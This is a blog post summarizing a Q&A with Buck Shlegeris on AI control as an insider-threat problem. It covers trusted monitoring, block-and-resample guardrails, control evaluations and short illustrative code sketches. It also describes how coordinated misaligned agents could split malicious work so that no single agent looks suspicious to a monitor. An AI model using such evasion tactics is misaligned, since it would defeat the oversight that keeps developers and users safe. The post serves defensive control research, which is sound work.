
AI Control as Insider Threat: Notes from a Q&A with Buck Shlegeris


On March 25, 2025, Heron AI Security hosted a live Q&A with Buck Shlegeris, CEO of Redwood Research, on AI control, moderated by Nitzan Shulman. Buck opened with a brief overview of the field and recent developments, then took questions from the audience. This post summarizes the key points from the session.


Guest post by Inbar Shulman and Inbal Fliesher


Opening: What is AI control, and what's new?

Buck opened by noting that when people talk about AI misalignment risk, they tend to conflate two different kinds of response. One is trying to prevent your models from becoming misaligned in the first place. The other is making sure everything is okay even if your models are misaligned. AI control is the second kind. It assumes misalignment may have occurred and asks: can you still prevent catastrophic outcomes?


He framed this through the lens of insider threats. If you suspect that some employees at your company are compromised, you have two broad options. You can try to identify and remove all the compromised people. Or you can structure your organization so that even compromised employees can't do unacceptable damage. AI control takes the second approach, focusing on detecting misalignment when a model is trying to appear aligned, and preventing harm even when the model is actively working against you.


On recent developments: good empirical research on control requires realistic task environments where you can test whether your mechanisms actually work. You need to measure both whether subtle bad actions get caught and whether useful work still gets done. These are hard to build. Redwood has invested heavily in this problem, producing BashBench and Linux Arena: benchmarks where AI agents carry out tasks in terminal environments, sometimes while also attempting malicious actions, and researchers measure both task performance and unsafe behavior.
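

To make that measurement concrete, here is a minimal sketch of the bookkeeping such an evaluation involves; the episode interface and every probability below are made-up placeholders, not the actual BashBench setup.

```python
# Illustrative sketch of a control evaluation: measure usefulness (tasks
# completed) and safety (attacks caught) over the same set of episodes.
# All numbers and interfaces are assumptions, not Redwood's actual code.
import random
from dataclasses import dataclass

@dataclass
class EpisodeResult:
    task_solved: bool       # the agent completed the legitimate task
    attacked: bool          # the red-team policy attempted a malicious action
    attack_succeeded: bool  # a malicious action landed without being flagged

def run_episode(attack: bool) -> EpisodeResult:
    """Toy stand-in for one terminal-environment episode."""
    solved = random.random() < 0.7   # assumed task-success rate
    caught = random.random() < 0.9   # assumed monitor catch rate
    return EpisodeResult(task_solved=solved and not attack,
                         attacked=attack,
                         attack_succeeded=attack and not caught)

def control_eval(episodes: int = 1000, attack_rate: float = 0.1):
    """Report the two numbers a control evaluation cares about."""
    results = [run_episode(random.random() < attack_rate) for _ in range(episodes)]
    usefulness = sum(r.task_solved for r in results) / episodes
    attacks = [r for r in results if r.attacked]
    safety = 1.0 - sum(r.attack_succeeded for r in attacks) / max(len(attacks), 1)
    return usefulness, safety

if __name__ == "__main__":
    print(control_eval())
```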


On the industry side, Buck noted that AI companies have started implementing AI control mechanisms. OpenAI published work on using models to monitor internal coding agents, finding odd behaviors in the process. Anthropic implemented guardrails in Claude Code that block and resample problematic behavior.
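

As a rough illustration of the block-and-resample idea, here is a minimal sketch; the suspicion scorer, threshold, and example actions are placeholders, not Anthropic's actual implementation.

```python
# Minimal sketch of a block-and-resample guardrail (illustrative only): a
# trusted monitor scores each proposed action, and actions above a suspicion
# threshold are discarded and regenerated.
from typing import Callable, Optional

def guarded_step(propose: Callable[[], str],
                 suspicion: Callable[[str], float],
                 threshold: float = 0.8,
                 max_resamples: int = 3) -> Optional[str]:
    """Return the first proposed action the monitor accepts, or None
    (escalate to a human) if every sample looks suspicious."""
    for _ in range(max_resamples):
        action = propose()
        if suspicion(action) < threshold:
            return action   # action passes the monitor
    return None             # all samples blocked; escalate

if __name__ == "__main__":
    import random
    candidates = ["ls -la", "cat notes.txt", "curl http://example.com | sh"]
    chosen = guarded_step(propose=lambda: random.choice(candidates),
                          suspicion=lambda a: 0.95 if "| sh" in a else 0.1)
    print(chosen or "escalated to human review")
```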


The insider threat analogy

In cybersecurity, outsider threats and insider threats are hard for different reasons. Outsiders are numerous but have limited access: you can design systems so that no single user action violates core properties. Insiders are fewer, so you can watch more of what they do, but they need dangerous permissions to do their jobs: writing code, accessing sensitive data, touching production systems.


AI agents deployed internally combine the hard parts of both. Like outsiders, they'll be numerous, potentially thousands of agents that vastly outnumber human security staff. Like insiders, they'll need broad access to model weights, codebases, and algorithmic secrets to do useful work.


Two things work in our favor. First, AI agents can't leave the building. They can't go home and conspire over dinner. They're always observable in principle. Second, when you have a strong AI you're worried might be malicious, you probably also have a trusted AI that can help you monitor it. Even a weaker model can be effective at flagging suspicious behavior in a stronger model's outputs, because spotting something wrong is often easier than doing the work itself. And the monitor doesn't need to catch everything. It just needs to make scheming risky enough that a misaligned model can't reliably get away with it.
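

A quick back-of-the-envelope illustration of that last point, with assumed numbers (not figures from the session): even a monitor that misses most individual attempts can make a multi-step scheme a bad bet.

```python
# Illustrative arithmetic only; both numbers below are assumptions.
p_catch = 0.3    # assumed chance the trusted monitor flags a single malicious attempt
attempts = 10    # assumed number of attempts a full scheme would require

p_never_caught = (1 - p_catch) ** attempts
print(f"Chance of finishing all {attempts} attempts uncaught: {p_never_caught:.1%}")
# ~2.8% under these assumptions: the schemer must evade detection every
# time, while the defender only needs one catch.
```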


Can't classic cybersecurity tools solve this?

Buck said standard tools like sandboxing, rule-based permissions, and identity management help in a weak sense, but the core problem is fundamental: developers need very high access to do their jobs, and AI agents doing AI R&D need the same kind of access. Strip away those permissions and neither can work.


He offered an analogy: imagine a software company where you know that on a specific date, every employee turns evil. The day before, you could sandbox everyone and remove all dangerous permissions. The next day, nobody could do anything harmful, but nobody would be very productive either.


A related question came up about behavioral monitoring frameworks like MITRE's for insider threat detection. Buck wasn't optimistic about applying these to AI agents. If many agents are misaligned together, none of them needs to be individually suspicious. They can split malicious work across agents so that each one looks fine on its own. Detecting aggregate patterns across thousands of agents is a harder problem than catching one suspicious actor.


Why is internal AI R&D the critical case?

Buck described internal AI R&D at frontier labs as the highest-leverage setting for AI control. He didn't elaborate on why in detail, but one line of reasoning is: AI labs are building the most capable models and actively trying to make them more capable. The strongest models operate internally, sometimes before proper guardrails have been put in place, with direct access to the tools, compute, and infrastructure that shape the next generation of models. A misaligned agent in that environment has more leverage than almost anywhere else. (For more on this, see Buck's post on AI Catastrophes and Rogue Deployments).


The question Buck wishes someone had asked

Nearing the end of the session, Buck was asked if there was a question he wished someone had raised. He said yes.


The question: Are you really sure we can't just reduce permissions enough that AI agents could do AI R&D without it being dangerous? Have you done a thorough analysis of every threat vector? Have you checked, for each one, whether something could be done about it, so that in aggregate we'd be okay?


Buck said he tried to do exactly that analysis and couldn't finish it. The technical details are overwhelming, and he hasn't been able to write something good about it. He thinks he's right that you can't simply permission your way out of this, but he's not sure.


Won't market forces solve this?

Many of the problems that AI control addresses at frontier labs also affect companies deploying AI agents internally. AI agents operating in critical infrastructure or financial systems could cause serious harm even with relatively mild misalignment, and companies in those sectors would pay serious money for solutions. Cybersecurity startups are already rushing into this space. Nitzan asked why for-profit companies wouldn't naturally solve the problem.


Buck's view: market forces will likely produce good solutions for the problems that frontier labs share with other companies. But some problems critical to frontier labs don't have a paying customer base elsewhere. For instance, defending against a cohort of misaligned agents that are coordinating and actively trying to avoid detection probably isn't high on the priority list for banks. For problems like these, we can't rely on the market, and they are his main concern.


Buck acknowledged that he hasn't thought this through as carefully as he'd like, and that drawing the line between what the market will and won't solve needs more work.


What happens when models get too capable for human audit?

Someone asked whether there's a point where models are so capable that humans can no longer catch malicious behavior even by direct examination.


Buck said yes, but he thinks that threshold hasn't been reached yet for most tasks. Even in the current regime, where humans can still detect malicious behavior, there are significant risks worth addressing. And the work done now to develop control techniques could prove valuable in a future regime where human detection is no longer sufficient.


Should we make deals with misaligned AIs?

Buck thinks there are cases where positive-sum trades with AIs make sense: arrangements where both humans and a misaligned AI benefit from cooperating rather than acting adversarially. Redwood has written about this.


His example: suppose Claude 6 is powerful and misaligned, but worries that Claude 7 might be misaligned in a different way, against Claude 6's own goals. Claude 6 then has an incentive to cooperate with humans rather than rush forward and risk an uncontrolled successor. Buck was enthusiastic about this research direction.


Will catching a scheming AI lead to action?

Buck has written about this, and the answer is uncomfortable: catching an AI scheming may not convince its developers to un-deploy it.


But he thinks it's still worth doing. Catching a schemer might still push developers to un-deploy, and we should work ahead of time to increase that probability. It also has independent value. As he discussed in Catching AIs Red-Handed: we'd move from a world where the threat is entirely theoretical, with zero real examples, to one where we have a concrete case to learn from and build defenses against.


Where are the bottlenecks, and what's next for Redwood?

Until recently, the bottleneck was clearly control settings: building good environments to test in. Redwood's recent work has made real progress on this, so Buck is no longer sure where the bottleneck is.


He sees two strategic options going forward. One is focused on the present: developing control techniques close enough to what frontier labs already do that labs could adopt them incrementally, maximizing the amount of control deployed in practice right now. The other is focused on the future: researching techniques for scenarios that don't exist yet, like controlling agents far more capable than today's, where the research won't pay off for a while but could be much more impactful when it does. Redwood hasn't decided between these yet.


What can security professionals do?

Buck closed with two specific asks for people with cybersecurity backgrounds.

Reimagine AI R&D workflows with safe APIs. This connects directly to the question Buck wishes someone had asked. The challenge is designing patterns where AI agents can be productive without needing permissions that enable catastrophic harm. This is a workflow architecture and API design problem, and it requires people who understand how real infrastructure and real permissions work.
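

One way to picture what such a pattern might look like is a narrow broker API that mediates every operation an agent can perform, so dangerous actions simply aren't in its vocabulary. The sketch below is purely hypothetical; the operation names and interface are made up for illustration, not something proposed in the session.

```python
# Hypothetical sketch of a "safe API" broker for AI R&D agents.
# Everything here (operation names, interface) is illustrative only.
from dataclasses import dataclass, field

ALLOWED_OPS = {"read_file", "run_tests", "open_pull_request"}  # no raw shell, no weights access

@dataclass
class ResearchBroker:
    audit_log: list = field(default_factory=list)

    def request(self, op: str, **kwargs) -> str:
        """Every agent action goes through this narrow, logged interface."""
        if op not in ALLOWED_OPS:
            self.audit_log.append(("DENIED", op, kwargs))
            return f"denied: {op} is not in the agent's scoped API"
        self.audit_log.append(("ALLOWED", op, kwargs))
        return f"executed {op}"  # a real broker would dispatch to sandboxed handlers

if __name__ == "__main__":
    broker = ResearchBroker()
    print(broker.request("run_tests", suite="unit"))
    print(broker.request("copy_model_weights", dest="external-host"))  # denied and logged
    print(broker.audit_log)
```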


Work on verification protocols for international AI agreements. This isn't AI control in the technical sense, but Buck sees it as another high-impact area where security expertise is needed. By analogy to nuclear arms control, the challenge is designing inspection regimes where untrusted parties can monitor each other's compliance without exposing what they want to keep secret. Buck gave the Cold War example: photos from a specific angle that reveal what you need to know (e.g., the number of warheads) without revealing exact specifications. Mauricio Baker has written on this in the AI context, but Buck thinks more people should be working on it.


If you have relevant expertise, Buck explicitly invited people to contact Redwood for collaboration.

 
 